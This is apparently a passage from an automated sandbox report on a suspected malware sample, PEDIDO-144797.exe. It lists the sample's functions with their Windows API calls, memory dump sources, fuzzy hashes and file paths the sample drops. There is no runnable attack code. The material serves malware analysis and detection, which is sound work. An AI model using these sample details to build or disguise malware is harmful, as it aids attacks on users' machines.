                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040574C
                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405751
                                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040579B
                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
                                                                                                                                          • CreatePopupMenu.USER32 ref: 004057E0
                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405814
                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405875
                                                                                                                                          • EmptyClipboard.USER32 ref: 0040587B
                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405891
                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004058C5
                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
                                                                                                                                          • CloseClipboard.USER32 ref: 004058D6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                          • String ID: (7B${
                                                                                                                                          • API String ID: 590372296-525222780
                                                                                                                                          • Opcode ID: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                                                                                                          • Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
                                                                                                                                          • Opcode Fuzzy Hash: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                                                                                                          • Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68
                                                                                                                                          Function 00404D90 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404DA8
                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404DB3
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404E10
                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404E86
                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404FE0
                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004051B0
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004051C0
                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405311
                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0040535F
                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040536A
                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405371
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                          • String ID: $M$N
                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                          • Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                                                                                          • Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
                                                                                                                                          • Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                                                                                          • Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58
                                                                                                                                          Function 00404814 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404863
                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040488D
                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040493E
                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404949
                                                                                                                                          • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 0040497B
                                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404987
                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999
                                                                                                                                            • Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09
                                                                                                                                            • Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403464,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                                                                                            • Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                                                                                            • Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403464,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                                                                                            • Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403464,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A5C
                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77
                                                                                                                                            • Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                                                                                            • Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
                                                                                                                                            • Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                          • String ID: (7B$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call
                                                                                                                                          • API String ID: 2624150263-212780734
                                                                                                                                          • Opcode ID: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                                                                                          • Instruction ID: 8d8d1438250e4d518a9e2371570913b63a9457987511b3c3302aefac7d34506d
                                                                                                                                          • Opcode Fuzzy Hash: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                                                                                          • Instruction Fuzzy Hash: B3A184F1A00209ABDB119FA5CD45AAF77B8EF84314F14843BFA01B62D1D77C99418B6D
                                                                                                                                          Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi, xrefs: 004021BD
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateInstance
                                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi
                                                                                                                                          • API String ID: 542301482-2076318099
                                                                                                                                          • Opcode ID: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
                                                                                                                                          • Instruction ID: fcf7de762e0310186ccf97c85ab7d5ba58e988de4da68cff16f28a22b081737a
                                                                                                                                          • Opcode Fuzzy Hash: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
                                                                                                                                          • Instruction Fuzzy Hash: EE414A75A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                                                                                          Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                          • Opcode ID: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
                                                                                                                                          • Instruction ID: 1506565ccd7b679c7f55cec76d0c208d7a3b57e4c41f2eb52868ec6bdbdc004a
                                                                                                                                          • Opcode Fuzzy Hash: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
                                                                                                                                          • Instruction Fuzzy Hash: 38F05E71A04104ABD710EBA4DA499ADB368EF00314F2005BBF541F21D1D7B84D919B2A
                                                                                                                                          Function 00403E6C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
                                                                                                                                          • ShowWindow.USER32(?), ref: 00403EC5
                                                                                                                                          • DestroyWindow.USER32 ref: 00403ED9
                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403F16
                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403F31
                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403FDF
                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403FE9
                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404003
                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404054
                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 004040FA
                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 0040411B
                                                                                                                                          • EnableWindow.USER32(?,?), ref: 0040412D
                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00404148
                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415E
                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00404165
                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417D
                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
                                                                                                                                          • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
                                                                                                                                          • SetWindowTextW.USER32(?,00423728), ref: 004041CE
                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00404302
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                          • String ID: (7B
                                                                                                                                          • API String ID: 184305955-3251261122
                                                                                                                                          • Opcode ID: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                                                                                                          • Instruction ID: 85a8b1cb5875a9f0130709c86f20b78f231723f1bf47f2e7597622744019d293
                                                                                                                                          • Opcode Fuzzy Hash: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                                                                                                          • Instruction Fuzzy Hash: 88C1A1B1640200FFDB216F61EE85D2B3BA8EB95305F40053EFA41B21F0CB7959529B6E
                                                                                                                                          Function 004044E2 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404580
                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404594
                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045B1
                                                                                                                                          • GetSysColor.USER32(?), ref: 004045C2
                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004045E3
                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040465E
                                                                                                                                          • SendMessageW.USER32(00000000), ref: 00404665
                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404690
                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
                                                                                                                                          • SetCursor.USER32(00000000), ref: 004046E4
                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404700
                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040472F
                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                          • String ID: Call$N$YD@
                                                                                                                                          • API String ID: 3103080414-3276248472
                                                                                                                                          • Opcode ID: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                                                                                                          • Instruction ID: b733f22c3e4a4344af423a89e947fb2470a434e6d87e1c723dfed1fecd84da00
                                                                                                                                          • Opcode Fuzzy Hash: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                                                                                                          • Instruction Fuzzy Hash: E16172B1A00209BFDB109F60DD85AAA7B69FB85354F00813AFB05BB1E0D7789951CF58
                                                                                                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                          • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
